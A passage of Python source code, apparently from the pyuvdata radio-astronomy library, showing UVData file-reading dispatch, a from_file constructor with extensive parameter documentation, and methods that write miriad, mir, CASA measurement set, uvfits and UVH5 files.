"on read. Entire file will be read and then select "
"will be performed".format(ftype=file_type)
)
# these file types do not have select on read, so set all
# select parameters
select_antenna_nums = antenna_nums
select_antenna_names = antenna_names
select_ant_str = ant_str
select_bls = bls
select_frequencies = frequencies
select_freq_chans = freq_chans
select_times = times
select_time_range = time_range
select_polarizations = polarizations
select_blt_inds = blt_inds
else:
select = False
elif file_type in ["uvfits", "uvh5"]:
select = False
elif file_type in ["miriad"]:
if (
antenna_names is not None
or frequencies is not None
or freq_chans is not None
or times is not None
or blt_inds is not None
):
if blt_inds is not None:
if (
antenna_nums is not None
or ant_str is not None
or bls is not None
or time_range is not None
):
warnings.warn(
"Warning: blt_inds is set along with select "
"on read keywords that are supported by "
"read_miriad and may downselect blts. "
"This may result in incorrect results "
"because the select on read will happen "
"before the blt_inds selection so the indices "
"may not match the expected locations."
)
else:
warnings.warn(
"Warning: a select on read keyword is set that is "
"not supported by read_miriad. This select will "
"be done after reading the file."
)
select = True
# these are all done by partial read, so set to None
select_antenna_nums = None
select_ant_str = None
select_bls = None
select_time_range = None
select_polarizations = None
# these aren't supported by partial read, so do it in select
select_antenna_names = antenna_names
select_frequencies = frequencies
select_freq_chans = freq_chans
select_times = times
select_blt_inds = blt_inds
else:
select = False
# reading a single "file". Call the appropriate file-type read
if file_type == "uvfits":
self.read_uvfits(
filename,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
time_range=time_range,
lsts=lsts,
lst_range=lst_range,
polarizations=polarizations,
blt_inds=blt_inds,
read_data=read_data,
keep_all_metadata=keep_all_metadata,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
elif file_type == "mir":
self.read_mir(
filename,
isource=isource,
irec=irec,
isb=isb,
corrchunk=corrchunk,
pseudo_cont=pseudo_cont,
)
select = False
elif file_type == "miriad":
self.read_miriad(
filename,
antenna_nums=antenna_nums,
ant_str=ant_str,
bls=bls,
polarizations=polarizations,
time_range=time_range,
read_data=read_data,
phase_type=phase_type,
correct_lat_lon=correct_lat_lon,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
calc_lst=calc_lst,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
elif file_type == "mwa_corr_fits":
self.read_mwa_corr_fits(
filename,
use_aoflagger_flags=use_aoflagger_flags,
use_cotter_flags=use_cotter_flags,
remove_dig_gains=remove_dig_gains,
remove_coarse_band=remove_coarse_band,
correct_cable_len=correct_cable_len,
correct_van_vleck=correct_van_vleck,
cheby_approx=cheby_approx,
flag_small_auto_ants=flag_small_auto_ants,
flag_small_sig_ants=flag_small_sig_ants,
propagate_coarse_flags=propagate_coarse_flags,
flag_init=flag_init,
edge_width=edge_width,
start_flag=start_flag,
end_flag=end_flag,
flag_dc_offset=True,
remove_flagged_ants=remove_flagged_ants,
phase_to_pointing_center=phase_to_pointing_center,
read_data=read_data,
data_array_dtype=data_array_dtype,
nsample_array_dtype=nsample_array_dtype,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
elif file_type == "fhd":
self.read_fhd(
filename,
use_model=use_model,
background_lsts=background_lsts,
read_data=read_data,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
elif file_type == "ms":
self.read_ms(
filename,
data_column=data_column,
pol_order=pol_order,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
elif file_type == "uvh5":
self.read_uvh5(
filename,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
time_range=time_range,
lsts=lsts,
lst_range=lst_range,
polarizations=polarizations,
blt_inds=blt_inds,
read_data=read_data,
data_array_dtype=data_array_dtype,
keep_all_metadata=keep_all_metadata,
multidim_index=multidim_index,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
select = False
if select:
self.select(
antenna_nums=select_antenna_nums,
antenna_names=select_antenna_names,
ant_str=select_ant_str,
bls=select_bls,
frequencies=select_frequencies,
freq_chans=select_freq_chans,
times=select_times,
time_range=select_time_range,
polarizations=select_polarizations,
blt_inds=select_blt_inds,
keep_all_metadata=keep_all_metadata,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if make_multi_phase:
self._set_multi_phase_center(preserve_phase_center_info=True)
if unphase_to_drift:
if self.phase_type != "drift":
warnings.warn("Unphasing this UVData object to drift")
self.unphase_to_drift(
phase_frame=orig_phase_frame, use_ant_pos=phase_use_ant_pos,
)
if phase_center_radec is not None:
if np.array(phase_center_radec).size != 2:
raise ValueError("phase_center_radec should have length 2.")
# If this object is not phased or is not phased close to
# phase_center_radec, (re)phase it.
# Close is defined using the phase_center_ra/dec tolerances.
if self.phase_type == "drift" or (
not np.isclose(
self.phase_center_ra,
phase_center_radec[0],
rtol=self._phase_center_ra.tols[0],
atol=self._phase_center_ra.tols[1],
)
or not np.isclose(
self.phase_center_dec,
phase_center_radec[1],
rtol=self._phase_center_dec.tols[0],
atol=self._phase_center_dec.tols[1],
)
or (self.phase_center_frame != phase_frame)
or (self.phase_center_epoch != phase_epoch)
):
warnings.warn("Phasing this UVData object to phase_center_radec")
self.phase(
phase_center_radec[0],
phase_center_radec[1],
epoch=phase_epoch,
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=phase_use_ant_pos,
allow_rephase=True,
)
@classmethod
def from_file(
cls,
filename,
axis=None,
file_type=None,
allow_rephase=True,
phase_center_radec=None,
unphase_to_drift=False,
phase_frame="icrs",
phase_epoch=None,
orig_phase_frame=None,
phase_use_ant_pos=True,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
polarizations=None,
blt_inds=None,
time_range=None,
keep_all_metadata=True,
read_data=True,
phase_type=None,
correct_lat_lon=True,
use_model=False,
data_column="DATA",
pol_order="AIPS",
data_array_dtype=np.complex128,
nsample_array_dtype=np.float32,
use_aoflagger_flags=None,
use_cotter_flags=None,
remove_dig_gains=True,
remove_coarse_band=True,
correct_cable_len=False,
correct_van_vleck=False,
cheby_approx=True,
flag_small_auto_ants=True,
flag_small_sig_ants=None,
propagate_coarse_flags=True,
flag_init=True,
edge_width=80e3,
start_flag="goodtime",
end_flag=0.0,
flag_dc_offset=True,
remove_flagged_ants=True,
phase_to_pointing_center=False,
skip_bad_files=False,
multidim_index=False,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
isource=None,
irec=None,
isb=None,
corrchunk=None,
pseudo_cont=False,
lsts=None,
lst_range=None,
calc_lst=True,
fix_old_proj=None,
fix_use_ant_pos=True,
make_multi_phase=False,
ignore_name=False,
):
"""
Initialize a new UVData object by reading the input file.
Parameters
----------
filename : str or array_like of str
The file(s) or list(s) (or array(s)) of files to read from.
file_type : str
One of ['uvfits', 'miriad', 'fhd', 'ms', 'uvh5'] or None.
If None, the code attempts to guess what the file type is.
For miriad and ms types, this is based on the standard directory
structure. For FHD, uvfits and uvh5 files it's based on file
extensions (FHD: .sav, .txt; uvfits: .uvfits; uvh5: .uvh5).
Note that if a list of datasets is passed, the file type is
determined from the first dataset.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
allow_rephase : bool
Allow rephasing of phased file data so that data from files with
different phasing can be combined.
phase_center_radec : array_like of float
The phase center to phase the files to before adding the objects in
radians (in the ICRS frame). If set to None and multiple files are
read with different phase centers, the phase center of the first
file will be used.
unphase_to_drift : bool
Unphase the data from the files before combining them.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & abberation.
Only used if `phase_center_radec` is set.
orig_phase_frame : str
The original phase frame of the data (if it is already phased). Used
for unphasing, only if `unphase_to_drift` or `phase_center_radec`
are set. Defaults to using the 'phase_center_frame' attribute or
'icrs' if that attribute is None.
phase_use_ant_pos : bool
If True, calculate the phased or unphased uvws directly from the
antenna positions rather than from the existing uvws.
Only used if `unphase_to_drift` or `phase_center_radec` are set.
antenna_nums : array_like of int, optional
The antennas numbers to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided.
antenna_names : array_like of str, optional
The antennas names to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when reading data into the object. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include when reading data into the object.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`antenna_names`, `bls` args or the `polarizations` parameters,
if it is a ValueError will be raised.
frequencies : array_like of float, optional
The frequencies to include when reading data into the object, each
value passed here should exist in the freq_array.
freq_chans : array_like of int, optional
The frequency channel numbers to include when reading data into the
object. Ignored if read_data is False.
times : array_like of float, optional
The times to include when reading data into the object, each value
passed here should exist in the time_array in the file.
Cannot be used with `time_range`.
time_range : array_like of float, optional
The time range in Julian Date to include when reading data into
the object, must be length 2. Some of the times in the file should
fall between the first and last elements.
Cannot be used with `times`.
polarizations : array_like of int, optional
The polarizations numbers to include when reading data into the
object, each value passed here should exist in the polarization_array.
blt_inds : array_like of int, optional
The baseline-time indices to include when reading data into the
object. This is not commonly used.
keep_all_metadata : bool
Option to keep all the metadata associated with antennas, even those
that do not have data associated with them after the select option.
read_data : bool
Read in the data. Only used if file_type is 'uvfits',
'miriad' or 'uvh5'. If set to False, only the metadata will be
read in. Setting read_data to False results in a metdata only
object.
phase_type : str, optional
Option to specify the phasing status of the data. Only used if
file_type is 'miriad'. Options are 'drift', 'phased' or None.
'drift' means the data are zenith drift data, 'phased' means the
data are phased to a single RA/Dec. Default is None
meaning it will be guessed at based on the file contents.
correct_lat_lon : bool
Option to update the latitude and longitude from the known_telescopes
list if the altitude is missing. Only used if file_type is 'miriad'.
use_model : bool
Option to read in the model visibilities rather than the dirty
visibilities (the default is False, meaning the dirty visibilities
will be read). Only used if file_type is 'fhd'.
data_column : str
name of CASA data column to read into data_array. Options are:
'DATA', 'MODEL', or 'CORRECTED_DATA'. Only used if file_type is 'ms'.
pol_order : str
Option to specify polarizations order convention, options are
'CASA' or 'AIPS'. Only used if file_type is 'ms'.
data_array_dtype : numpy dtype
Datatype to store the output data_array as. Must be either
np.complex64 (single-precision real and imaginary) or np.complex128 (double-
precision real and imaginary). Only used if the datatype of the visibility
data on-disk is not 'c8' or 'c16'. Only used if file_type is 'uvh5' or
'mwa_corr_fits'.
nsample_array_dtype : numpy dtype
Datatype to store the output nsample_array as. Must be either
np.float64 (double-precision), np.float32 (single-precision), or
np.float16 (half-precision). Half-precision is only recommended for
cases where no sampling or averaging of baselines will occur,
because round-off errors can be quite large (~1e-3). Only used if
file_type is 'mwa_corr_fits'.
use_aoflagger_flags : bool
Only used if file_type is 'mwa_corr_fits'. Option to use aoflagger mwaf
flag files. Defaults to true if aoflagger flag files are submitted.
use_cotter_flags : bool
Being replaced by use_aoflagger_flags and will be removed in v2.4.
remove_dig_gains : bool
Only used if file_type is 'mwa_corr_fits'. Option to divide out digital
gains.
remove_coarse_band : bool
Only used if file_type is 'mwa_corr_fits'. Option to divide out coarse
band shape.
correct_cable_len : bool
Flag to apply cable length correction. Only used if file_type is
'mwa_corr_fits'.
correct_van_vleck : bool
Flag to apply a van vleck correction. Only used if file_type is
'mwa_corr_fits'.
cheby_approx : bool
Only used if file_type is 'mwa_corr_fits' and correct_van_vleck is True.
Option to implement the van vleck correction with a chebyshev polynomial
approximation. Set to False to run the integral version of the correction.
flag_small_auto_ants : bool
Only used if correct_van_vleck is True. Option to completely flag any
antenna for which the autocorrelation falls below a threshold found by
the Van Vleck correction to indicate bad data. Specifically, the
threshold used is 0.5 * integration_time * channel_width. If set to False,
only the times and frequencies at which the auto is below the
threshold will be flagged for the antenna. Only used if file_type is
'mwa_corr_fits'.
flag_small_sig_ants : bool
Being replaced by flag_small_auto_ants and will be removed in v2.4.
propogate_coarse_flags : bool
Option to propogate flags for missing coarse channel integrations
across frequency. Only used if file_type is 'mwa_corr_fits'.
flag_init: bool
Only used if file_type is 'mwa_corr_fits'. Set to True in order to
do routine flagging of coarse channel edges, start or end
integrations, or the center fine channel of each coarse
channel. See associated keywords.
edge_width: float
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to the width to flag on the edge of each coarse channel, in hz.
Errors if not equal to integer multiple of channel_width. Set to 0
for no edge flagging.
start_flag: float or str
Only used if flag_init is True. The number of seconds to flag at the
beginning of the observation. Set to 0 for no flagging. Default is
'goodtime', which uses information in the metafits file to determine
the length of time that should be flagged. Errors if input is not a
float or 'goodtime'. Errors if float input is not equal to an
integer multiple of the integration time.
end_flag: floats
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to the number of seconds to flag at the end of the observation. Set
to 0 for no flagging. Errors if not an integer multiple of the
integration time.
flag_dc_offset: bool
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to True to flag the center fine channel of each coarse channel. Only
used if file_type is 'mwa_corr_fits'.
remove_flagged_ants : bool
Option to perform a select to remove antennas flagged in the metafits
file. If correct_van_vleck and flag_small_auto_ants are both True then
antennas flagged by the Van Vleck correction are also removed.
Only used if file_type is 'mwa_corr_fits'.
phase_to_pointing_center : bool
Flag to phase to the pointing center. Only used if file_type is
'mwa_corr_fits'. Cannot be set if phase_center_radec is not None.
skip_bad_files : bool
Option when reading multiple files to catch read errors such that
the read continues even if one or more files are corrupted. Files
that produce errors will be printed. Default is False (files will
not be skipped).
multidim_index : bool
[Only for HDF5] If True, attempt to index the HDF5 dataset
simultaneously along all data axes. Otherwise index one axis at-a-time.
This only works if data selection is sliceable along all but one axis.
If indices are not well-matched to data chunks, this can be slow.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after after reading in the file (the default is True,
meaning the check will be run). Ignored if read_data is False.
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
Ignored if read_data is False.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done). Ignored if read_data is False.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
isource : int
Source code for MIR dataset
irec : int
Receiver code for MIR dataset
isb : int
Sideband code for MIR dataset
corrchunk : int
Correlator chunk code for MIR dataset
pseudo_cont : boolean
Read in only pseudo-continuuum values in MIR dataset. Default is false.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
calc_lst : bool
Recalculate the LST values that are present within the file, useful in
cases where the "online" calculate values have precision or value errors.
Default is True. Only applies to MIRIAD files.
fix_old_proj : bool
Applies a fix to uvw-coordinates and phasing, assuming that the old `phase`
method was used prior to writing the data, which had errors of the order of
one part in 1e4 - 1e5. See the phasing memo for more details. Default is
False, unless reading a UVH5 file that is missing the `phase_center_app_ra`
and `phase_center_app_dec` attributes (as these were introduced at the same
time as the new `phase` method), in which case the default is True.
fix_use_ant_pos : bool
If setting `fix_old_proj` to True, use the antenna positions to derive the
correct uvw-coordinates rather than using the baseline vectors. Default is
True.
make_multi_phase : bool
Option to make the output a multi phase center dataset, capable of holding
data on multiple phase centers. By default, this is only done if reading
in a file with multiple sources.
ignore_name : bool
Only relevant when reading in multiple files, which are concatenated into a
single UVData object. Option to ignore the name of the phase center when
combining multiple files, which would otherwise result in an error being
raised because of attributes not matching. Doing so effectively adopts the
name found in the first file read in. Default is False.
Raises
------
ValueError
If the file_type is not set and cannot be determined from the file name.
If incompatible select keywords are set (e.g. `ant_str` with other
antenna selectors, `times` and `time_range`) or select keywords
exclude all data or if keywords are set to the wrong type.
If the data are multi source or have multiple
spectral windows.
If phase_center_radec is not None and is not length 2.
"""
uvd = cls()
uvd.read(
filename,
axis=axis,
file_type=file_type,
allow_rephase=allow_rephase,
phase_center_radec=phase_center_radec,
unphase_to_drift=unphase_to_drift,
phase_frame=phase_frame,
phase_epoch=phase_epoch,
orig_phase_frame=orig_phase_frame,
phase_use_ant_pos=phase_use_ant_pos,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
polarizations=polarizations,
blt_inds=blt_inds,
time_range=time_range,
keep_all_metadata=keep_all_metadata,
read_data=read_data,
phase_type=phase_type,
correct_lat_lon=correct_lat_lon,
use_model=use_model,
data_column=data_column,
pol_order=pol_order,
data_array_dtype=data_array_dtype,
nsample_array_dtype=nsample_array_dtype,
use_aoflagger_flags=use_aoflagger_flags,
use_cotter_flags=use_cotter_flags,
remove_dig_gains=remove_dig_gains,
remove_coarse_band=remove_coarse_band,
correct_cable_len=correct_cable_len,
correct_van_vleck=correct_van_vleck,
cheby_approx=cheby_approx,
flag_small_auto_ants=flag_small_auto_ants,
flag_small_sig_ants=flag_small_sig_ants,
propagate_coarse_flags=propagate_coarse_flags,
flag_init=flag_init,
edge_width=edge_width,
start_flag=start_flag,
end_flag=end_flag,
flag_dc_offset=flag_dc_offset,
remove_flagged_ants=remove_flagged_ants,
phase_to_pointing_center=phase_to_pointing_center,
skip_bad_files=skip_bad_files,
multidim_index=multidim_index,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
isource=isource,
irec=irec,
isb=isb,
corrchunk=corrchunk,
pseudo_cont=pseudo_cont,
lsts=lsts,
lst_range=lst_range,
calc_lst=calc_lst,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
make_multi_phase=make_multi_phase,
ignore_name=ignore_name,
)
return uvd
def write_miriad(
self,
filepath,
clobber=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
no_antnums=False,
calc_lst=False,
):
"""
Write the data to a miriad file.
Parameters
----------
filename : str
The miriad root directory to write to.
clobber : bool
Option to overwrite the filename if the file already exists.
run_check : bool
Option to check for the existence and proper shapes of parameters
after before writing the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters before
writing the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
no_antnums : bool
Option to not write the antnums variable to the file.
Should only be used for testing purposes.
calc_lst : bool
Recalculate the LST values upon writing the file. This is done to perform
higher-precision accounting for the difference in MIRAD timestamps vs
pyuvdata (the former marks the beginning of an integration, the latter
marks the midpoint). Default is False, which instead uses a simple formula
for correcting the LSTs, expected to be accurate to approximately 0.1 µsec
precision.
Raises
------
ValueError
If the frequencies are not evenly spaced or are separated by more
than their channel width or if the UVData object is a metadata only object.
TypeError
If any entry in extra_keywords is not a single string or number.
"""
if self.metadata_only:
raise ValueError("Cannot write out metadata only objects to a miriad file.")
miriad_obj = self._convert_to_filetype("miriad")
miriad_obj.write_miriad(
filepath,
clobber=clobber,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
no_antnums=no_antnums,
calc_lst=calc_lst,
)
del miriad_obj
def write_mir(
self, filepath,
):
"""
Write the data to a mir file.
Parameters
----------
filename : str
The mir root directory to write to.
Raises
------
ValueError
If the UVData object is a metadata only object.
NotImplementedError
Method is not fully implemented yet, and thus will raise an error
"""
if self.metadata_only:
raise ValueError("Cannot write out metadata only objects to a mir file.")
mir_obj = self._convert_to_filetype("mir")
mir_obj.write_mir(filepath,)
del mir_obj
def write_ms(
self,
filename,
force_phase=False,
clobber=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Write a CASA measurement set (MS).
Parameters
----------
filename : str
The measurement set file path to write to (a measurement set is really
a folder with many files).
force_phase : bool
Option to automatically phase drift scan data to zenith of the first
timestamp.
clobber : bool
Option to overwrite the file if it already exists.
run_check : bool
Option to check for the existence and proper shapes of parameters
before writing the file.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters before
writing the file.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If the UVData object is a metadata only object.
"""
if self.metadata_only:
raise ValueError(
"Cannot write out metadata only objects to a measurement set file."
)
ms_obj = self._convert_to_filetype("ms")
ms_obj.write_ms(
filename,
force_phase=force_phase,
clobber=clobber,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
del ms_obj
def write_uvfits(
self,
filename,
spoof_nonessential=False,
write_lst=True,
force_phase=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Write the data to a uvfits file.
Parameters
----------
filename : str
The uvfits file to write to.
spoof_nonessential : bool
Option to spoof the values of optional UVParameters that are not set
but are required for uvfits files.
write_lst : bool
Option to write the LSTs to the metadata (random group parameters).
force_phase: : bool
Option to automatically phase drift scan data to zenith of the first
timestamp.
run_check : bool
Option to check for the existence and proper shapes of parameters
after before writing the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters before
writing the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
The `phase_type` of the object is "drift" and the `force_phase`
keyword is not set.
If the frequencies are not evenly spaced or are separated by more
than their channel width.
The polarization values are not evenly spaced.
Any of ['antenna_positions', 'gst0', 'rdate', 'earth_omega', 'dut1',
'timesys'] are not set on the object and `spoof_nonessential` is False.
If the `timesys` parameter is not set to "UTC".
If the UVData object is a metadata only object.
TypeError
If any entry in extra_keywords is not a single string or number.
"""
if self.metadata_only:
raise ValueError("Cannot write out metadata only objects to a uvfits file.")
uvfits_obj = self._convert_to_filetype("uvfits")
uvfits_obj.write_uvfits(
filename,
spoof_nonessential=spoof_nonessential,
write_lst=write_lst,
force_phase=force_phase,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
del uvfits_obj
def write_uvh5(
self,
filename,
clobber=False,
chunks=True,
data_compression=None,
flags_compression="lzf",
nsample_compression="lzf",
data_write_dtype=None,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Write a completely in-memory UVData object to a UVH5 file.
Parameters
----------
filename : str
The UVH5 file to write to.
clobber : bool
Option to overwrite the file if it already exists.
chunks : tuple or bool
h5py.create_dataset chunks keyword. Tuple for chunk shape,
True for auto-chunking, None for no chunking. Default is True.
data_compression : str
HDF5 filter to apply when writing the data_array. Default is
None meaning no filter or compression. Dataset must be chunked.
flags_compression : str
HDF5 filter to apply when writing the flags_array. Default is "lzf"
for the LZF filter. Dataset must be chunked.
nsample_compression : str
HDF5 filter to apply when writing the nsample_array. Default is "lzf"
for the LZF filter. Dataset must be chunked.
data_write_dtype : numpy dtype
datatype of output visibility data. If 'None', then the same datatype
as data_array will be used. Otherwise, a numpy dtype object must be
specified with an 'r' field and an 'i' field for real and imaginary
parts, respectively. See uvh5.py for an example of defining such a datatype.
run_check : bool
Option to check for the existence and proper shapes of parameters
after before writing the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters before
writing the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If the UVData object is a metadata only object.
"""
if self.metadata_only:
raise ValueError(
"Cannot write out metadata only objects to a uvh5 file. To initialize "
"a uvh5 file for partial writing, use the `initialize_uvh5_file` "
"method."
)
uvh5_obj = self._convert_to_filetype("uvh5")
uvh5_obj.write_uvh5(
filename,
clobber=clobber,
chunks=chunks,
data_compression=data_compression,
flags_compression=flags_compression,
nsample_compression=nsample_compression,
data_write_dtype=data_write_dtype,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
del uvh5_obj
def initialize_uvh5_file(
self,
filename,
clobber=False,
chunks=True,
data_compression=None,
flags_compression="lzf",
nsample_compression="lzf",
data_write_dtype=None,
):
"""
Initialize a UVH5 file on disk with the header metadata and empty data arrays.
Parameters
----------
filename : str
The UVH5 file to write to.
clobber : bool
Option to overwrite the file if it already exists.
chunks : tuple or bool
h5py.create_dataset chunks keyword. Tuple for chunk shape,
True for auto-chunking, None for no chunking. Default is True.
data_compression : str
HDF5 filter to apply when writing the data_array. Default is
None meaning no filter or compression. Dataset must be chunked.
flags_compression : str
HDF5 filter to apply when writing the flags_array. Default is "lzf"
for the LZF filter. Dataset must be chunked.
nsample_compression : str
HDF5 filter to apply when writing the nsample_array. Default is "lzf"
for the LZF filter. Dataset must be chunked.
data_write_dtype : numpy dtype
datatype of output visibility data. If 'None', then the same datatype
as data_array will be used. Otherwise, a numpy dtype object must be
specified with an 'r' field and an 'i' field for real and imaginary
parts, respectively. See uvh5.py for an example of defining such a datatype.
Notes
-----
When partially writing out data, this function should be called first
to initialize the file on disk. The data is then actually written by
calling the write_uvh5_part method, with the same filename as the one
specified in this function. See the tutorial for a worked example.
"""
uvh5_obj = self._convert_to_filetype("uvh5")
uvh5_obj.initialize_uvh5_file(
filename,
clobber=clobber,
chunks=chunks,
data_compression=data_compression,
flags_compression=flags_compression,
nsample_compression=nsample_compression,
data_write_dtype=data_write_dtype,
)
del uvh5_obj
def write_uvh5_part(
self,
filename,
data_array,
flags_array,
nsample_array,
check_header=True,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
polarizations=None,
blt_inds=None,
add_to_history=None,
run_check_acceptability=True,
):
"""
Write data to a UVH5 file that has already been initialized.
Parameters
----------
filename : str
The UVH5 file to write to. It must already exist, and is assumed to
have been initialized with initialize_uvh5_file.
data_array : ndarray
The data to write to disk. A check is done to ensure that the
dimensions of the data passed in conform to the ones specified by
the "selection" arguments.
flags_array : ndarray
The flags array to write to disk. A check is done to ensure that the
dimensions of the data passed in conform to the ones specified by
the "selection" arguments.
nsample_array : ndarray
The nsample array to write to disk. A check is done to ensure that the
dimensions of the data passed in conform to the ones specified by
the "selection" arguments.
check_header : bool
Option to check that the metadata present in the header on disk
matches that in the object.
antenna_nums : array_like of int, optional
The antennas numbers to include when writing data into the file
(antenna positions and names for the removed antennas will be retained).
This cannot be provided if `antenna_names` is also provided.
antenna_names : array_like of str, optional
The antennas names to include when writing data into the file
(antenna positions and names for the removed antennas will be retained).
This cannot be provided if `antenna_nums` is also provided.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when writing data into the file. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include writing data into the file.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
